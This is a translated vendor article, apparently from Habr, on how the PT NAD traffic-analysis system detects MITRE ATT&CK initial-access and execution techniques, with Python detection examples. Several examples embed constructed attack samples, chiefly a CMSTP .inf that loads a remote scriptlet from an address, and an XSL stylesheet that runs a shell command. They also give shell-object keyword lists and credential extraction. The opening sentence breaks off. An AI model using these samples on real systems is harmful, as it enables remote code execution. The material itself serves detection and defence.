Suppose a SIEM that collects logs and analyzes events is already in place, and antivirus software is installed on the endpoints. Nevertheless,
NTA systems come in two types: some work with NetFlow, others analyze raw traffic. The advantage of the second type is that it can store raw traffic records. Thanks to them, information security specialists can confirm whether an attack succeeded, localize the threat, and understand how the attack happened and how to prevent similar ones in the future.
We will show how NTA can identify, by direct or indirect indicators, all the known attack tactics listed in the knowledge base.
About the ATT&CK knowledge base
MITRE ATT&CK is a public knowledge base developed and maintained by the MITRE Corporation on the basis of analyzing real APTs. It is a structured set of the tactics and techniques attackers use, which lets information security specialists around the world speak the same language. The knowledge base is constantly expanded and supplemented with new knowledge.
The knowledge base identifies 12 tactics, divided according to the stages of a cyberattack:
- Initial Access;
- Execution;
- Persistence;
- Privilege Escalation;
- Defense Evasion;
- Credential Access;
- Discovery;
- Lateral Movement;
- Collection;
- Command and Control;
- Exfiltration;
- Impact.
For each tactic, the ATT&CK knowledge base lists the techniques that help the attacker achieve the goal of the current stage of the attack. Since the same technique can be used at different stages, it may be referenced by several tactics.
The description of each technique includes:
- an identifier;
- the list of tactics in which it is used;
- examples of its use by APT groups;
- measures to mitigate the damage from its use;
- detection recommendations.
Information security specialists can use the knowledge in the database to structure information about current attack methods and to build an effective security system with it in mind. Understanding how real APT groups operate can also serve as a source of hypotheses for proactively searching for threats as part of threat hunting.
About PT Network Attack Discovery
We will identify the use of techniques from the ATT&CK matrix with the PT Network Attack Discovery (PT NAD) system. The system detects attacks by ATT&CK techniques using detection rules written by the vendor's expert team.
The original article includes the full mapping of PT NAD onto the MITRE ATT&CK matrix as a large image (not reproduced here).
Initial Access
The Initial Access tactic covers techniques for getting into the corporate network. The attacker's goal at this stage is to deliver malicious code to the target system and ensure it can be executed later.
PT NAD traffic analysis reveals seven techniques for gaining initial access:
1. T1189: Drive-by Compromise
A technique in which the victim opens a website that the attacker uses to exploit the web browser and obtain application access tokens.
What PT NAD does: If web traffic is not encrypted, PT NAD inspects the content of HTTP server responses for exploits that let the attacker execute arbitrary code in the browser. PT NAD detects such exploits automatically with detection rules.
In addition, PT NAD catches the threat one step earlier: rules and indicators of compromise trigger when a user visits a site that redirects them to a site hosting a set of exploits.
2. T1190: Exploit Public-Facing Application
Exploitation of vulnerabilities in services reachable from the Internet.
What PT NAD does: Performs deep inspection of network packet contents and reveals signs of anomalous activity in them. In particular, there are rules that detect attacks on major content management systems (CMS), on the web interfaces of network equipment, and on mail and FTP servers.
3. T1133: External Remote Services
The attacker uses remote access services to connect to internal network resources from outside.
What PT NAD does: Because the system recognizes protocols by packet content rather than by port number, users can filter traffic to find all sessions of remote access protocols and check whether they are legitimate.
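As an added example (not PT NAD code), the following Python shows what recognizing a protocol "by packet content rather than by port number" means in practice: the first payload bytes of a session are matched against the public handshake signatures of SSH (RFC 4253), VNC/RFB (RFC 6143), RDP (a TPKT header followed by an X.224 Connection Request) and TLS (RFC 5246), so a remote access session hidden on a web port still surfaces. The session records are constructed for illustration, and the standard-port table is this example's own.

```python
import re

# Identification by content: the opening bytes each protocol puts on the wire.
# The signatures come from the public specifications, not from any vendor's engine.
def identify_protocol(first_bytes: bytes) -> str:
    """Return a protocol name based on content alone, or 'unknown'."""
    # SSH: both peers start with "SSH-protoversion-softwareversion\r\n" (RFC 4253)
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    # VNC: the server greets with "RFB xxx.yyy\n", e.g. "RFB 003.008\n" (RFC 6143)
    if re.match(rb"RFB \d{3}\.\d{3}\n", first_bytes):
        return "vnc"
    # RDP: TPKT header (03 00 len len), then an X.224 Connection Request (code 0xE0)
    if len(first_bytes) >= 6 and first_bytes[0:2] == b"\x03\x00" and first_bytes[5] == 0xE0:
        return "rdp"
    # TLS: handshake record (0x16), version 0x03 0x0X, first handshake message ClientHello (0x01)
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03
            and first_bytes[5] == 0x01):
        return "tls"
    return "unknown"

REMOTE_ACCESS = {"ssh", "vnc", "rdp"}
# Ports a port-based filter would associate with each protocol (example's own table)
STANDARD_PORTS = {"ssh": {22}, "vnc": {5900, 5901}, "rdp": {3389}}

def find_remote_access_sessions(sessions):
    """sessions: iterable of (src, dst, dst_port, first payload bytes seen in the session).
    Returns the remote-access sessions and whether each would slip past a port-based filter."""
    hits = []
    for src, dst, port, payload in sessions:
        proto = identify_protocol(payload)
        if proto in REMOTE_ACCESS:
            hits.append({
                "src": src, "dst": dst, "port": port, "protocol": proto,
                "nonstandard_port": port not in STANDARD_PORTS[proto],
            })
    return hits

# Constructed sample sessions (not captured traffic)
SAMPLE_SESSIONS = [
    # genuine TLS ClientHello on 443
    ("10.0.0.5", "203.0.113.10", 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),
    # SSH server banner on 443: invisible to a port-based view of "remote access"
    ("10.0.0.7", "203.0.113.20", 443, b"SSH-2.0-OpenSSH_8.4\r\n"),
    # VNC server greeting on 8080
    ("10.0.0.9", "198.51.100.3", 8080, b"RFB 003.008\n"),
    # RDP connection request on its usual port
    ("10.0.0.3", "10.0.0.50", 3389,
     b"\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00"),
]

if __name__ == "__main__":
    for hit in find_remote_access_sessions(SAMPLE_SESSIONS):
        print(hit)
```

The two sessions flagged with `nonstandard_port` are exactly the ones a port-based filter for "remote access" would never show an analyst; the RDP session on 3389 is found either way but still needs a legitimacy check.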
4. T1193: Spearphishing Attachment
This is the notorious sending of phishing attachments.
What PT NAD does: Automatically extracts files from traffic and checks them against indicators of compromise. Executable files inside attachments are detected by rules that analyze the content of mail traffic; in a corporate environment such an attachment is considered anomalous.
5. T1192: Spearphishing Link
Use of phishing links. The attacker sends a phishing email containing a link; clicking it downloads a malicious program. As a rule, the link comes with text composed according to all the rules of social engineering.
What PT NAD does: Detects phishing links using indicators of compromise. For example, the PT NAD interface shows sessions in which an HTTP connection was made to a link from the list of phishing addresses (phishing URLs).
Screenshot: a connection via a link from the list of indicators of compromise (phishing URLs).
6. T1199: Trusted Relationship
Access to the victim's network through third parties the victim has a trusted relationship with. Attackers may compromise a trusted organization and connect to the target network through it. They use VPN connections or domain trusts for this, which can be revealed through traffic analysis.
What PT NAD does: Parses application protocols and stores the parsed fields in a database. Thanks to this, an information security analyst can use filters to find all suspicious VPN or cross-domain connections in the database.
7. T1078: Valid Accounts
Use of standard, local, or domain credentials for authorization to external and internal services.
What PT NAD does: Automatically extracts credentials from the HTTP, FTP, SMTP, POP3, IMAP, SMB, DCE/RPC, SOCKS5, LDAP and Kerberos protocols. As a rule these are the login, the password, and an indication of whether authentication succeeded. If the credentials were used, they are displayed in the card of the corresponding session.
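To make "login, password and an indication of success" concrete, here is an added Python example (not PT NAD code) that pulls those three fields out of two of the unencrypted session types named above: an HTTP request carrying Basic authentication together with its response, and an FTP control channel. Both sample sessions are constructed; the `C:`/`S:` prefixes marking client and server lines in the FTP sample are this example's own convention for a reassembled stream.

```python
import base64
import re

def extract_http_basic(request: bytes, response: bytes):
    """Return login/password from an HTTP Basic Authorization header and whether the
    server accepted them. Only a 401 is counted as rejection; any other status means the
    server did not reject the credentials."""
    m = re.search(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", request, re.M | re.I)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a subclass of ValueError
        return None
    login, _, password = decoded.partition(":")
    status = re.match(rb"HTTP/\d\.\d (\d{3})", response)
    success = bool(status) and status.group(1) != b"401"
    return {"protocol": "http", "login": login, "password": password, "success": success}

def extract_ftp(control_channel: str):
    """control_channel: one message per line, 'C:' for client, 'S:' for server (constructed
    representation of a reassembled FTP control stream). Success is decided by the reply
    code: 230 = logged in, 530 = login incorrect (RFC 959)."""
    login = password = None
    success = False
    for line in control_channel.splitlines():
        side, _, text = line.partition(":")
        text = text.strip()
        if side == "C":
            cmd, _, arg = text.partition(" ")
            if cmd.upper() == "USER":
                login = arg
            elif cmd.upper() == "PASS":
                password = arg
        elif side == "S":
            code = text[:3]
            if code == "230":
                success = True
            elif code == "530":
                success = False
    if login is None:
        return None
    return {"protocol": "ftp", "login": login, "password": password, "success": success}

# Constructed samples (not captured traffic)
HTTP_REQUEST = (b"GET /admin/ HTTP/1.1\r\nHost: intranet.example.test\r\n"
                b"Authorization: Basic YWRtaW46UEBzc3cwcmQ=\r\n\r\n")
HTTP_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>...</html>"
FTP_SESSION = """S:220 ftp.example.test FTP server ready
C:USER backup
S:331 Password required for backup
C:PASS Winter2020!
S:230 User backup logged in
C:QUIT
S:221 Goodbye"""

def extract_all():
    """Run both extractors over the samples; the result is what a session card would show."""
    results = (extract_http_basic(HTTP_REQUEST, HTTP_RESPONSE), extract_ftp(FTP_SESSION))
    return [r for r in results if r]

if __name__ == "__main__":
    for record in extract_all():
        print(record)
```

The success flag is what turns a credential sighting into a finding: a password that was accepted by an internal service deserves a different response from one that was rejected, and the same extractor would also catch a valid account being used from an unusual source host.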
Execution
The Execution tactic covers the techniques attackers use to run code on compromised systems. Executing malicious code helps the attacker establish a foothold (the Persistence tactic) and extend access to remote systems on the network by moving within the perimeter.
With PT NAD, the use of 14 techniques that attackers employ to execute malicious code can be identified.
1. T1191: CMSTP (Microsoft Connection Manager Profile Installer)
A technique in which the attacker prepares a specially crafted malicious .inf installation file for the built-in Windows utility CMSTP.exe (Connection Manager Profile Installer). CMSTP.exe takes the file as a parameter and installs a service profile for a remote connection. As a result, CMSTP.exe can be used to download and execute dynamic link libraries (*.dll) or scriptlets (*.sct) from remote servers.
What PT NAD does: Automatically detects the transfer of .inf files of this special format in HTTP traffic. It also detects the HTTP transfer of malicious scriptlets and dynamic link libraries from remote servers.
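What "a special format" of .inf means can be shown with a small parser. The Python below is an added example, not PT NAD's detection logic: it splits an INF file into sections and flags the two constructs publicly documented (LOLBAS) for CMSTP abuse, a RunPreSetupCommandsSection or RunPostSetupCommandsSection that runs arbitrary commands and an UnRegisterOCXSection or RegisterOCXSection that hands a remote .sct to scrobj.dll. All three INF samples are constructed, and the command-section check reports every command it finds, so a real rule would be baselined against profiles generated by the Connection Manager Administration Kit.

```python
import re

def parse_inf(text: str) -> dict:
    """Minimal INF/INI parser: {section name: [non-comment lines]}. ';' begins a comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        m = re.fullmatch(r"\[(.+?)\]", line)
        if m:
            current = m.group(1)
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections

# Sections a CMSTP profile uses to run things during installation (names are case-insensitive)
COMMAND_SECTIONS = {"runpresetupcommandssection", "runpostsetupcommandssection"}
OCX_SECTIONS = {"registerocxsection", "unregisterocxsection"}

def cmstp_inf_indicators(text: str) -> list:
    """Return human-readable reasons a CMSTP .inf looks weaponised; [] means nothing found."""
    reasons = []
    for name, lines in parse_inf(text).items():
        lname = name.lower()
        for line in lines:
            if lname in COMMAND_SECTIONS:
                reasons.append(f"{name} runs: {line}")
            elif lname in OCX_SECTIONS and "scrobj.dll" in line.lower():
                # "%11%\scrobj.dll,NI,<path or URL>.sct": scrobj.dll loads the scriptlet
                target = line.split(",")[-1].strip()
                reasons.append(f"{name} loads scriptlet via scrobj.dll: {target}")
    return reasons

# Constructed samples modelled on the publicly documented abuse layouts; 203.0.113.5 is a
# documentation address and calc.exe stands in for a payload.
INF_SCRIPTLET = r"""[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://203.0.113.5/payload.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
"""

INF_COMMANDS = r"""[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; commands here run before the profile is installed
c:\windows\system32\calc.exe
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
"""

INF_BENIGN = r"""[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
AddReg=AddRegSection

[AddRegSection]
HKCU,"%AppAct%\%ServiceName%","",0,"%ServiceName%"

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="CorpVPN"
"""

if __name__ == "__main__":
    for sample in (INF_SCRIPTLET, INF_COMMANDS, INF_BENIGN):
        print(cmstp_inf_indicators(sample))
```

Run against the body of an HTTP response whose content looks like an INF file, the same function also gives the analyst the remote .sct URL to pivot on, which is the second transfer the paragraph above says is detected.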
2. T1059: Command-Line Interface
Interaction with the command-line interface. The command-line interface can be operated locally or remotely (for example, via remote access utilities).
What PT NAD does: Automatically detects the presence of a shell from the responses to commands that launch various command-line utilities, such as ping or ifconfig.
3. T1175: Component Object Model and Distributed COM
Use of COM or DCOM technology to execute code on local or remote systems while moving across the network.
What PT NAD does: Detects suspicious DCOM calls that attackers commonly use to launch programs.
4. T1203: Exploitation for Client Execution
Exploitation of vulnerabilities to execute arbitrary code on a workstation. The most useful exploits for an attacker are those that allow code execution on a remote system, since they can be used to gain access to it. The technique can be implemented through malicious mailings, websites with browser exploits, and remote exploitation of application vulnerabilities.
What PT NAD does: While parsing mail traffic, PT NAD checks whether attachments contain executable files. It automatically extracts office documents, which may contain exploits, from emails. Attempts to exploit vulnerabilities are visible in traffic, and PT NAD detects them automatically.
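The attachment checks described for T1193 (Spearphishing Attachment) above and for T1203 here come down to looking at what an attachment is rather than what it is called. The Python below is an added example, not PT NAD code: it builds a constructed MIME message with three attachments, then extracts them and classifies each by its leading bytes, flagging a PE executable hiding behind a .pdf name and an OOXML document that carries a vbaProject.bin (a VBA macro project). The file contents are stubs built inside the example, not real malware, and the classification table is this example's own.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

def classify_bytes(data: bytes) -> str:
    """Classify attachment content by magic bytes, ignoring the declared file name."""
    if data.startswith(b"MZ"):
        return "pe-executable"          # DOS/PE header: .exe, .dll, .scr, ...
    if data.startswith(b"%PDF"):
        return "pdf"
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = [n.lower() for n in zf.namelist()]
        except zipfile.BadZipFile:
            return "zip-corrupt"
        if any(n.endswith("vbaproject.bin") for n in names):
            return "office-macro"       # OOXML document with an embedded VBA project
        if any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
            return "office-document"
        return "zip"
    return "other"

def inspect_attachments(raw_mail: bytes) -> list:
    """Extract every attachment and report its type, a name/content mismatch and a verdict."""
    msg = email.message_from_bytes(raw_mail, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        kind = classify_bytes(data)
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        disguised = kind == "pe-executable" and ext not in {"exe", "dll", "scr", "com"}
        findings.append({
            "filename": name, "size": len(data), "type": kind, "disguised": disguised,
            "suspicious": kind in {"pe-executable", "office-macro"},
        })
    return findings

def build_sample_mail() -> bytes:
    """Constructed message: a PE header stub named like a PDF, a macro-enabled Word
    document stub, and a harmless text file. Neither stub contains runnable code."""
    msg = EmailMessage()
    msg["From"] = "accounting@example.test"
    msg["To"] = "user@corp.example"
    msg["Subject"] = "Invoice 2020-117"
    msg.set_content("Please find the invoice attached.")
    fake_pe = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
    msg.add_attachment(fake_pe, maintype="application", subtype="pdf", filename="invoice.pdf")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 stub")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12", filename="invoice.docm")
    msg.add_attachment("meeting notes", subtype="plain", filename="notes.txt")
    return msg.as_bytes()

if __name__ == "__main__":
    for finding in inspect_attachments(build_sample_mail()):
        print(finding)
```

Classifying by content is what makes the "executable inside an attachment is anomalous" rule hold up against renamed files; the same extracted bytes are what would then be hashed and compared against indicators of compromise.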
5. T1170: Mshta
Use of the mshta.exe utility, which runs Microsoft HTML Applications (HTA) with the .hta extension. Because mshta processes files while bypassing browser security settings, attackers can use mshta.exe to run malicious HTA, JavaScript or VBScript files.
What PT NAD does: .hta files run through mshta are also transmitted over the network, and this is visible in traffic. PT NAD automatically detects the transfer of such malicious files, captures them, and shows information about them in the session card.
6. T1086: PowerShell
Use of PowerShell to search for information and execute malicious code.
What PT NAD does: When an attacker uses PowerShell remotely, PT NAD detects it with rules. It detects the PowerShell keywords most frequently used in malicious scripts, as well as the transfer of PowerShell scripts over SMB.
7. Scheduled Task
Use of the Windows Task Scheduler and other utilities to run programs or scripts automatically at a specified time.
What PT NAD does: Attackers usually create such tasks remotely, which means such sessions are visible in traffic. PT NAD automatically detects suspicious task creation and modification operations over the ATSVC and ITaskSchedulerService RPC interfaces.
8. T1064: Scripting
Execution of scripts to automate various attacker actions.
What PT NAD does: Detects the transfer of scripts over the network, that is, even before the script is launched. It detects script content in raw traffic and the network transfer of files with extensions corresponding to popular scripting languages.
9. T1035: Service Execution
Execution of executables, CLI commands or scripts by interacting with Windows services such as the Service Control Manager (SCM).
What PT NAD does: Inspects SMB traffic and detects requests to the SCM with rules for service creation, modification and start.
The service-start technique can be implemented with the remote command execution utility PSExec. PT NAD parses the SMB protocol and detects the use of PSExec when the PSEXESVC.exe file or the standard PSEXECSVC service name is used to execute code on a remote machine. The user then needs to review the list of executed commands and confirm that remote command execution from that host is legitimate.
Screenshot: the attack card in PT NAD shows data on the tactics and techniques used according to the ATT&CK matrix, so the user can understand which stage of the attack the attacker is at, what goals they are pursuing, and what countermeasures to take.
Screenshot: triggering of the rule for the use of the PSExec utility, which may indicate an attempt to execute commands on a remote machine.
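The PSExec pattern described above is a sequence rather than a single packet: an executable written to the ADMIN$ share, a service created through the SVCCTL interface whose binary path points at that file, and that service being started. As an added example (not PT NAD's rules), the Python below correlates those three steps over a list of already-parsed SMB/DCERPC events. The event schema (`smb2_write`, `svcctl_CreateServiceW`, `svcctl_StartServiceW` and their fields) is this example's own stand-in for what a traffic analyser would extract, and the events are constructed. It goes a little beyond the text in that the chain is flagged even when the operator renamed the service (PsExec's `-r` option), with lower confidence than a hit on the default PSEXESVC names.

```python
from collections import defaultdict

def detect_remote_service_execution(events, window=60):
    """events: dicts sorted by 'ts' with the fields used below (constructed schema standing
    in for what an NTA parses out of SMB2 and DCERPC/SVCCTL). Returns one alert per
    write -> CreateServiceW -> StartServiceW chain between the same two hosts that
    completes within `window` seconds."""
    alerts = []
    written = defaultdict(dict)   # (src, dst) -> {exe name: write ts}
    created = defaultdict(dict)   # (src, dst) -> {service name: (exe name, create ts)}
    for e in events:
        key = (e["src"], e["dst"])
        if (e["op"] == "smb2_write" and e.get("share", "").upper() == "ADMIN$"
                and e["path"].lower().endswith(".exe")):
            written[key][e["path"].split("\\")[-1].lower()] = e["ts"]
        elif e["op"] == "svcctl_CreateServiceW":
            binary = e["binary_path"].split("\\")[-1].lower()
            write_ts = written[key].get(binary)
            if write_ts is not None and e["ts"] - write_ts <= window:
                created[key][e["service_name"]] = (binary, e["ts"])
        elif e["op"] == "svcctl_StartServiceW":
            hit = created[key].get(e["service_name"])
            if hit and e["ts"] - hit[1] <= window:
                binary, _ = hit
                default_names = ("psexesvc" in e["service_name"].lower()
                                 or binary == "psexesvc.exe")
                alerts.append({
                    "src": e["src"], "dst": e["dst"],
                    "service": e["service_name"], "binary": binary,
                    "confidence": "high" if default_names else "medium",
                    "note": ("PsExec default service/file name" if default_names
                             else "PsExec-like chain with a renamed service (cf. psexec -r)"),
                })
    return alerts

# Constructed events (not a capture). 10.0.0.5 -> 10.0.0.20: stock PsExec.
# 10.0.0.5 -> 10.0.0.21: the same chain with a renamed service.
# 10.0.0.9 -> 10.0.0.22: an admin copies an installer to ADMIN$ but never creates a service.
SAMPLE_EVENTS = [
    {"ts": 100, "src": "10.0.0.5", "dst": "10.0.0.20", "op": "smb2_write",
     "share": "ADMIN$", "path": "PSEXESVC.exe"},
    {"ts": 101, "src": "10.0.0.5", "dst": "10.0.0.20", "op": "svcctl_CreateServiceW",
     "service_name": "PSEXESVC", "binary_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": 102, "src": "10.0.0.5", "dst": "10.0.0.20", "op": "svcctl_StartServiceW",
     "service_name": "PSEXESVC"},
    {"ts": 200, "src": "10.0.0.5", "dst": "10.0.0.21", "op": "smb2_write",
     "share": "ADMIN$", "path": "svcupd.exe"},
    {"ts": 201, "src": "10.0.0.5", "dst": "10.0.0.21", "op": "svcctl_CreateServiceW",
     "service_name": "svc_upd", "binary_path": "%SystemRoot%\\svcupd.exe"},
    {"ts": 203, "src": "10.0.0.5", "dst": "10.0.0.21", "op": "svcctl_StartServiceW",
     "service_name": "svc_upd"},
    {"ts": 300, "src": "10.0.0.9", "dst": "10.0.0.22", "op": "smb2_write",
     "share": "ADMIN$", "path": "setup.exe"},
]

if __name__ == "__main__":
    for alert in detect_remote_service_execution(SAMPLE_EVENTS):
        print(alert)
```

The lone write to ADMIN$ from 10.0.0.9 produces nothing, which is the point of correlating the chain instead of alerting on any one step: copying a file to an administrative share is routine, creating and starting a service from a file that arrived seconds earlier is not.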
10. T1072: Third-party Software
A technique in which the attacker gains access to remote administration software or an enterprise software deployment system and uses it to execute malicious code. Examples of such software: SCCM, VNC, TeamViewer, HBSS, Altiris.
Incidentally, this technique is especially relevant given the mass shift to remote work and the resulting connection of many unprotected home devices over dubious remote access channels.
What PT NAD does: Automatically detects the operation of such software on the network. For example, rules trigger on the fact of a connection over the VNC protocol and on the activity of the EvilVNC Trojan, which covertly installs a VNC server on the victim's host and starts it automatically. PT NAD also automatically detects the TeamViewer protocol, which lets the analyst find all such sessions with a filter and check whether they are legitimate.
11. T1204: User Execution
A technique in which the user runs a file that can lead to code execution. This is the case, for example, when an executable is opened or an Office document containing a macro is run.
What PT NAD does: Sees such files at the transfer stage, before they are launched. Information about them can be examined in the card of the session in which they were transmitted.
12. T1047: Windows Management Instrumentation
Use of the WMI tool, which provides local and remote access to Windows system components. With WMI, attackers can interact with local and remote systems and perform a variety of tasks, such as collecting information for reconnaissance and launching processes remotely during lateral movement.
What PT NAD does: Because interaction with remote systems over WMI is visible in traffic, PT NAD automatically detects network requests that establish WMI sessions and checks the traffic for scripts transferred via WMI.
13. T1028: Windows Remote Management
Use of the Windows service and protocol that lets a user interact with remote systems.
What PT NAD does: Sees network connections established with Windows Remote Management. Such sessions are detected automatically by rules.
14. T1220: XSL (Extensible Stylesheet Language) Script Processing
XSL stylesheets describe the processing and rendering of data in XML files. To support complex operations, the XSL standard includes support for inline scripts in several languages. These languages allow arbitrary code execution, bypassing whitelist-based security policies.
What PT NAD does: Detects the transfer of such files over the network, that is, even before the file is launched. It automatically detects XSL files being transferred over the network and files with anomalous XSL markup.
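Added example (not PT NAD's rules): the Python below shows what "anomalous XSL markup" looks like from a detector's point of view. It first decides whether a transferred file is XSLT at all by looking for the XSLT namespace in the content (not the extension or MIME type), then parses it and reports any msxsl:script block (the Microsoft extension element that carries inline JScript or VBScript, the construct used in the publicly documented wmic /FORMAT abuse) together with the scripting objects the script touches. The sample stylesheets are constructed. One caveat: xml.etree offers no protection against entity-expansion attacks, so on untrusted traffic a hardened parser such as defusedxml should take its place.

```python
import xml.etree.ElementTree as ET

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# Objects an inline XSL script needs in order to do more than transform data
SHELL_TOKENS = ("WScript.Shell", "ActiveXObject", "Shell.Application", "CreateObject", ".Run(")

def is_xsl(data: bytes) -> bool:
    """Content-based check: the file declares the XSLT namespace, whatever it is called."""
    return XSLT_NS.encode() in data

def xsl_script_indicators(xsl_text: str) -> list:
    """Return reasons an XSL stylesheet looks like a code carrier; [] means none found."""
    try:
        root = ET.fromstring(xsl_text)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    reasons = []
    for el in root.iter():
        if el.tag != f"{{{MSXSL_NS}}}script":
            continue
        language = el.get("language") or "(unspecified)"
        reasons.append(f"msxsl:script block, language {language}")
        body = el.text or ""
        for token in SHELL_TOKENS:
            if token.lower() in body.lower():
                reasons.append(f"script references {token}")
    return reasons

def triage(data: bytes) -> dict:
    """What a detector would attach to a transferred file: is it XSL, and does it carry script?"""
    if not is_xsl(data):
        return {"is_xsl": False, "indicators": []}
    return {"is_xsl": True,
            "indicators": xsl_script_indicators(data.decode("utf-8", "replace"))}

# Constructed stylesheets. The first mirrors the layout of the public wmic /FORMAT proof
# of concept; "calc.exe" stands in for a payload.
MALICIOUS_XSL = """<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform"
            xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
  <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
  ]]>
  </ms:script>
</stylesheet>
"""

BENIGN_XSL = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <html><body><h1><xsl:value-of select="/report/title"/></h1></body></html>
  </xsl:template>
</xsl:stylesheet>
"""

if __name__ == "__main__":
    for sample in (MALICIOUS_XSL, BENIGN_XSL):
        print(triage(sample.encode()))
```

A stylesheet that only declares templates and value-of selections produces no indicators; one that embeds a script block is reported before anything has parsed it on the endpoint, which is the "before the file is launched" property the paragraph above describes.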
In the next article we will look at how the PT Network Attack Discovery NTA system detects the other attacker tactics and techniques according to MITRE ATT&CK. Stay tuned!
Authors:
- Anton Kutepov, specialist at PT Expert Security Center, Positive Technologies
- Natalia Kazankova, product marketing manager at Positive Technologies
Source: habr.com